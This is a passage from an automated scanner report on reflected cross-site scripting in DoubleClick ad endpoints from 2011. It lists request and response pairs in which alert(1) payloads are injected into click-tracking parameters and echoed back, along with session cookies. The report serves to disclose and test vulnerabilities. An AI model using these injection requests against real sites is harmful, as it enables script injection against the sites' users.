Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:39:36 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:39:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec6ca'-alert(1)-'f51a1f2bbf was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bec6ca'-alert(1)-'f51a1f2bbf&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:40:55 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:40:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 519
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3fe5'-alert(1)-'94dbc11099d was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=c3fe5'-alert(1)-'94dbc11099d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 520
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:41:33 GMT
Expires: Mon, 07 Mar 2011 01:41:33 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e51c3'-alert(1)-'5d2e0e24608 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832e51c3'-alert(1)-'5d2e0e24608&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:39:11 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:39:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9edc"-alert(1)-"8bb572df34f was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70f9edc"-alert(1)-"8bb572df34f&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:49:16 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:49:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70f9edc"-alert(1)-"8bb572df34f&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3 ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f1b6'-alert(1)-'199859732fe was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=704f1b6'-alert(1)-'199859732fe&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:49:20 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:49:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=704f1b6'-alert(1)-'199859732fe&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3 ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1003"-alert(1)-"71bfd521409 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685f1003"-alert(1)-"71bfd521409&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:33 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... eclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685f1003"-alert(1)-"71bfd521409&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32e24'-alert(1)-'4a3043c545 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=10968532e24'-alert(1)-'4a3043c545&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:37 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6995
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... eclick.net/click%3Bh%3Dv8/3ac3/f/a5/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=10968532e24'-alert(1)-'4a3043c545&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51eaf'-alert(1)-'d7a41afa548 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b51eaf'-alert(1)-'d7a41afa548&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:50:03 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:50:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b51eaf'-alert(1)-'d7a41afa548&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\"> ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f488a"-alert(1)-"6b12f66611a was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bf488a"-alert(1)-"6b12f66611a&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:49:59 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:49:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bf488a"-alert(1)-"6b12f66611a&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM"); var fs ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a0d'-alert(1)-'16687507dee was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=73a0d'-alert(1)-'16687507dee HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:50:46 GMT
Expires: Mon, 07 Mar 2011 01:50:46 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=73a0d'-alert(1)-'16687507deehttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\"> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f1e2"-alert(1)-"0bc0708a95e was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=6f1e2"-alert(1)-"0bc0708a95e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:50:42 GMT
Expires: Mon, 07 Mar 2011 01:50:42 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=6f1e2"-alert(1)-"0bc0708a95ehttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM"); var fscUrl = url ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f7f"-alert(1)-"5a9954e2121 was submitted in the sz parameter. This input was echoed unmodified in the application's response. (As with the other sz findings, the scanner's label comes from its handling of the semicolon-delimited path; the payload is in fact appended to the mt_aid value inside the click1 URL, as the request below shows.)
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=5800033496117848370f7f"-alert(1)-"5a9954e2121&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:03 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tp://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=5800033496117848370f7f"-alert(1)-"5a9954e2121&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbe5e'-alert(1)-'0ce86ae9e85 was submitted in the sz parameter. This input was echoed unmodified in the application's response. (Again the injection point the scanner calls sz is the mt_aid value inside the click1 URL; see the request below.)
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483cbe5e'-alert(1)-'0ce86ae9e85&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:07 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tp://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483cbe5e'-alert(1)-'0ce86ae9e85&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D ...[SNIP]...
1.27. http://ad.doubleclick.net/adj/syn.embarq/footer [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/syn.embarq/footer
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3277a'-alert(1)-'4ce2523eee0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/syn.embarq/footer?3277a'-alert(1)-'4ce2523eee0=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
